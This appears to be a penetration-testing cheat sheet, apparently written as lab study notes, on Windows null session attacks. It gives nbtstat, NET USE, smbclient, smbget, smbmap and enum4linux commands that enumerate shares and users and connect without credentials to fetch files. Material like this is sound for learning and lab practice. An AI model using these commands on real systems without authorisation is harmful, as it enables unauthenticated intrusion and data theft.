Skip to content

Windows Null session attack

It’s used to enumerate info (password, system users, system groups. running system processes). A null session attack exploits an authentification vulnerability for Windows Administrative Shares. This lets an attacker connect to a local or remote share without authentification.

Manually from Windows

  1. Enumerate File Server services: 
1
2
3
4
5
6
nbtstat -A $ip  

# ELS-WINXP   <00>   UNIQUE   Registered
# <00> tells us ELS-WINXP is a workstation.
# <20> says that the file sharing service is up and running on the machine
# UNIQUE tells us that this compiter must have only one IP address assigned
  1. Enumerate Windows Shares. Once we spot a machine with the File Server service running, we can enumerate:
1
NET VIEW $ip
  1. Verify if a null attack is possible by exploiting the IPC$ administrative share and trying to connect without valid credentials.
1
NET USE \\$ip\IPC$ ‘’ /u:’’

This tells Windows to connect to the IPC$ share by using an empty password and a empty username. It only works with IPC$ (not c$).

Manually from Linux

Using the samba suite: https://www.samba.org/

  1. Enumerate File Server services: 
1
nmblookup -A $ip
  1. Also with the smbclient we can enumerate the shares provides by a host: 
1
2
3
4
5
smbclient -L //$ip -N

# -L  Look at what services are available on a target
# $ip Prepend the two slahes
# -N  Force the tool not to ask for a password
  1. Connect:
1
smbclient \\$ip\sharedfolder -N

Be careful, sometimes the shell removes the slashes and you need to escape them.

  1. Once connected you can browse with the smb command line. To see allowed commands: help

  2. When you know the path of a file and you want to retrieve it:

    • from kali: 
      1
      smbget smb://$ip/SharedFolder/flag_1.txt
    • from smb command line: 
      1
      get flag_1.txt

  3. To map users with permissions

1
smbmap -H demo.ine.local

To get an specific file in a connection: get flag.txt

Tricks

Enumerate users with enum4linux -U demo.ine.local

Enumerate the permissions of users with smbmap -H demo.ine.local

If some users are missing in the permission list, maybe they are accesible, try with:

1
smbclient -L //$ip\<user> -N

More tools

Last update: 2023-07-01
Created: February 2, 2023 19:36:50